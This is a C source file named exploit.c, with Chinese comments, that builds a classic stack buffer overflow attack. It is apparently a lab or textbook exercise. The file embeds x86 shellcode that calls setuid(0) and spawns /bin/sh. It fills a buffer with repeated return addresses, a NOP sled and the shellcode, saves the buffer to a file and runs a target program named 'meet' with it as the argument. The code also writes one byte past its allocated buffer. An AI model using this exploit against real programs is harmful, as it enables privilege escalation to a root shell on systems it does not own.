exploit.c

#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

char shellcode[] =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";


unsigned long get_sp(void){
    __asm__("movl %esp,%eax");
}

int main(int argc,char *argv[]){          // main function
    int offset=0;         // 选择一个特定的偏移，将ESP 减去该偏移获得返回地址                    
    unsigned long esp,ret,*addr_ptr;   
    char *buffer,*ptr;
    int size = 500;

    esp = get_sp();

    if(argc > 1 ) size = atoi(argv[1]);
    if(argc > 2 ) offset = atoi(argv[2]);
    if(argc > 3 ) esp = strtoul(argv[3],NULL,0);
    ret = esp-offset;

    fprintf(stderr,"Usage: %s <buff_size> <offset> <esp:0xfff...>\n",argv[0]);

    fprintf(stderr,"ESP:0x%x Offset:0x%x Return:0x%x\n",esp,offset,ret);
    buffer = (char*)malloc(size);    // 加1是因为需要一个额外的字节存储 '\0'
    ptr = buffer;
    addr_ptr = (unsigned long*)ptr;

    for(int i=0; i<size; i+=4){    // 先将缓冲区填满 ret
        *(addr_ptr++)=ret;
    }

    for(int i=0; i< size/2; i++){ // 将缓冲区的一半填充 NOP
        buffer[i]='\x90';
    }

    ptr = buffer + size/2; // 定位NOP 末尾的地址
    for(int i=0; i<strlen(shellcode); i++){  // 填充 shellcode
        *(ptr++)=shellcode[i];
    }
 
    buffer[size]=0; // 缓冲区最后一个字节设置为字符串结束符 '\0'
                    // 以下代码用于测试生成的攻击缓冲区字符串
    FILE *fp = NULL;
    fp = fopen("./mycode","wb");
    size_t len = fwrite(buffer,size,1,fp);
    printf("buffer has written in mycode\n");
    fclose(fp);
    
    execl("./meet","meet",buffer,0);  // 参数分别表示 可执行程序路径，argv[0] argv[1]...，最后是空指针结束
    printf("%s\n",buffer);
    free(buffer);                     // 清理堆内存
    return 0;
}